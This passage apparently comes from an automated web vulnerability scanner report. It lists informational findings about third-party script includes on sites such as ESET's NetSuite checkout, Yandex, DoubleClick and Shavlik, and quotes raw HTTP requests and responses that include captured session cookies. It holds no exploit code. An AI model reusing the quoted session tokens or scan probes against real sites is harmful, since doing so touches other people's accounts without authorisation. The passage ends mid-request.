<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...
24.4. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
24.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
24.6. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<link rel="SHORTCUT ICON" href="/favicon.ico"><script type="text/javascript" src="http://img.yandex.net/y5/1.5b-c/mega-y5.js"></script><link rel="shortcut icon" href="/favicon.ico"/><script type="text/javascript" charset="utf-8" src="//yandex.st/jquery/1.4.2/jquery.min.js"></script><script type="text/javascript" charset="utf-8" src="//yandex.st/lego/2.4-73/common/js/_common.js"></script>
...[SNIP]...
24.7. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...
24.8. http://games.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>........ .... web
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
24.9. http://goods.adnectar.com/static/quantcast_1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /static/quantcast_1.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /static/quantcast_1.html HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adnectar_id=PObkQ021gzROKXjpBM+iAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:36 GMT
Content-Type: text/html
Content-Length: 590
Last-Modified: Fri, 22 Apr 2011 00:28:44 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

</head>

<body>

<!-- Star
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
24.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4436

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...
24.13. http://hostpapasupport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostpapasupport.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: hostpapasupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: SWIFT_sessionid40=gmfpuglm6vnd5hd5tfn09i4kuyfmsiw0; path=/
Content-Type: text/html
Content-Length: 26068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<td align="center">


<script language=javascript src="http://173.46.7.45/SightMaxAgentInterface/Monitor.smjs?accountID=1&siteID=13&queueID=33&AllQueues=yes&exq35=true&exq36=true&exq44=true&exq45=true"></script>
...[SNIP]...
24.14. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
</script>
<script src="http://bs.yandex.ru/resource/watch.js" type="text/javascript"></script>
...[SNIP]...
24.15. http://learn.shavlik.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Le
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/comment-reply.js?ver=20090102'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
24.16. http://learn.shavlik.com/shavlik/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: learn.shavlik.com

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:17:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:17:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
24.17. http://learn.shavlik.com/shavlik/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/a HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
